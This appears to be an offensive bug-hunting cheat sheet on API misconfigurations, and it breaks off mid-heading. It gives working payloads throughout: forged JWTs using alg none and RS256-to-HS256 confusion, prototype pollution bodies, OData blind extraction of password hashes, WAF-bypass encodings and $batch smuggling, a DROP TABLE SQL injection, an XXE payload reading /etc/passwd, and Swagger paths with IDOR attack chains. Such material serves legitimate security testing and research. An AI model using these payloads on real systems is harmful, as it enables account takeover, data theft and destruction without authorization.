hunt-api-misconfig

12. API SECURITY MISCONFIGURATION

Mass Assignment

User.update(req.body)  // body has {"role": "admin"} → privilege escalation

JWT None Algorithm

header = {"alg": "none", "typ": "JWT"}
payload = {"sub": 1, "role": "admin"}
token = base64(header) + "." + base64(payload) + "."  # no signature

JWT RS256 → HS256 Algorithm Confusion

# Get server's public key from /.well-known/jwks.json
# Sign token with public key as HMAC secret
token = jwt.encode({"sub": "admin", "role": "admin"}, pub_key, algorithm="HS256")
# Server uses RS256 key as HS256 secret → accepts it

Prototype Pollution

// Server-side — Node.js merge without protection
{"__proto__": {"admin": true}}
{"constructor": {"prototype": {"admin": true}}}
// URL: ?__proto__[isAdmin]=true&__proto__[role]=superadmin

CORS Exploitation

# Test: reflected origin + credentials
curl -s -I -H "Origin: https://evil.com" https://target.com/api/user/me
# If: Access-Control-Allow-Origin: https://evil.com + Access-Control-Allow-Credentials: true
# → CRITICAL: attacker reads credentialed responses

OData $filter / $select / $expand WAF-Blacklist Bypass (2024-2026 surface)

OData (Open Data Protocol) is the query layer behind SharePoint, Microsoft Dynamics 365 / Power Platform, SAP NetWeaver Gateway / Fiori, and any ASP.NET WebAPI project using Microsoft.AspNetCore.OData. It exposes SQL-shaped query operators (eq, ne, and, or, substringof, startswith, tolower, concat, replace) that look SQL-ish but are NOT SQL — meaning keyword-blacklist WAFs routinely fail open on OData traffic.

Attack class 1 — Boolean-logic blind extraction via startswith / substringof

GET /_api/data/contacts?$filter=startswith(adx_identity_passwordhash,'a')
GET /_api/data/contacts?$filter=startswith(adx_identity_passwordhash,'aa')

Iterate prefix character-by-character; cardinality of the response (or @odata.count) is the boolean oracle that confirms the prefix is correct. No SQLi engine needed, no '/-- characters — the WAF sees only legitimate OData keywords. Extracted Microsoft Dynamics 365 / Power Apps Portals password hashes, names, emails, addresses, financial data in Dec 2023; Microsoft patched May 2024. (Stratus Security writeup, The Hacker News coverage Jan 2025)

Attack class 2 — $orderby / $select column-disclosure bypass

GET /api/data/v9.0/contacts?$orderby=emailaddress1 desc&$select=fullname

$orderby accepts column names the user has no $select permission for, but the engine still sorts on them — the returned order leaks the protected column. Column-level ACLs are enforced on the projection ($select) but NOT on $orderby / $filter — same protected column, different code path. Second Stratus finding in the same Dynamics 365 disclosure; "more dangerous than the first because it directly returned the data" per Stratus.

Attack class 3 — $batch multipart/mixed → per-request WAF signatures miss sub-operations

POST /odata/$batch  Content-Type: multipart/mixed; boundary=batch_1
--batch_1
Content-Type: application/http
GET Users?$filter=1 eq 1 HTTP/1.1
--batch_1--

WAFs that scan only the outer request body (or that don't natively parse multipart/mixed) skip every inner operation. ModSecurity refused multipart/mixed historically (Issue #3296); F5 added native batch parsing only in Advanced WAF v16.1 (F5 SAP-Fiori advisory). The 2025 WAFFLED paper (arXiv 2503.10846) generalises the parsing-discrepancy bypass class across 5 major WAFs.

Attack class 4 — Encoded / non-canonical operator → keyword-blacklist bypass

GET /api?%24filter=Name%20eq%20'x'%20or%201%20eq%201   # URL-encoded $
GET /api?%2524filter=...                                # double-encoded
GET /Users(1)/$value                                    # path-segment style

Mixed-case operators (Eq, EQ) and obscure ones (substringof, tolower, concat, replace) look unlike SELECT/UNION so SQLi-keyword signatures never fire. WAFs that key on the literal string $filter see neither form — but the OData server normalises both before evaluating the predicate. Documented since Kalra Black Hat AD 2012; canonical OData-vs-WAF impedance mismatch. (OWASP Double Encoding)

Attack class 5 — OData → real SQLi when library passes filter raw

$filter=Name eq 'x'); DROP TABLE Users--'

Only triggers when the OData layer string-concatenates into SQL instead of using LINQ. Documented in OData/WebApi Issue #2352. The XML-deserialisation variant: CVE-2019-17554 (Apache Olingo OData 4.0.0-4.6.0, XXE via <!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]> in application/xml body, CVSS 7.5). DoS variant: CVE-2018-8269 (Microsoft.Data.OData deep $filter recursion → stack overflow).

Bonus — $expand navigation-property IDOR

GET /Orders?$expand=Customer($expand=PaymentMethods($expand=Card))

Authorisation decorators applied to top-level entity sets; the engine joins along navigation properties without re-checking ACL on the joined entity. Same root cause as the 2021 PowerApps Portals 38M-record mass leak (UpGuard writeup).

Detection heuristics

• Response headers: OData-Version: 4.0 / DataServiceVersion: 3.0; URL paths /_api/, /odata/, /_vti_bin/, /api/data/v9.x/, /sap/opu/odata/.
• Try $metadata → if anonymous, the full schema (entity sets, navigation properties, function imports) is yours.
• Probe each entity set with $filter=1 eq 1, $top=1, $select=*, then $orderby=<column-you-shouldnt-see> for column-level ACL.
• Send the same payload three ways ($filter=, %24filter=, %2524filter=) and through $batch — divergent WAF behaviour confirms the parser-discrepancy bug.

NSwag / Swagger / OpenAPI Spec Exposure (2024-2026 surface)

NSwag is the Swagger/OpenAPI toolchain for ASP.NET Core. Default routes (/swagger, /swagger/v1/swagger.json, /swagger/index.html) ship enabled in many .NET 6/7/8 projects and developers leave them on in production. The exposed spec discloses every endpoint, HTTP methods, parameter names + types + formats + max-lengths, models, validation rules — a complete attack-map in JSON.

Default discovery paths (cross-references web2-recon)

# NSwag / Swashbuckle (ASP.NET Core)
/swagger, /swagger/index.html, /swagger/v1/swagger.json, /swagger/v2/swagger.json, /swagger/v3/swagger.json
/swagger-ui, /swagger-ui/, /swagger-ui.html, /api-docs
/nswag, /nswag/index.html, /api/swagger, /api/swagger.json, /api/openapi.json

# Generic OpenAPI
/openapi, /openapi.json, /openapi.yaml, /.well-known/openapi.json

# Java / Spring (Springfox / springdoc)
/v2/api-docs, /v3/api-docs, /v3/api-docs.yaml, /swagger-resources

# Python (FastAPI / Connexion)
/docs, /redoc, /openapi.json

# Quarkus
/q/openapi, /q/swagger-ui

# GraphQL adjacent
/graphql, /graphiql, /playground, /altair, /voyager

Tools: kiterunner natively eats OpenAPI; sj (Swagger Jacker), apidetector, XSSwagger.

Attack chains

A. Spec disclosure → mass IDOR / BOLA. Spec lists every GET /api/v1/users/{userId}/.... jq '.paths | keys' swagger.json → swap {userId} for victim's ID via Autorize/ffuf -mc 200. Common case: spec leaks /api/admin/users/{id}/reset-password documented but missing [Authorize(Roles="Admin")] on the controller — low-priv ATO.

**B. Spec disclosure → mass-assignment payload construct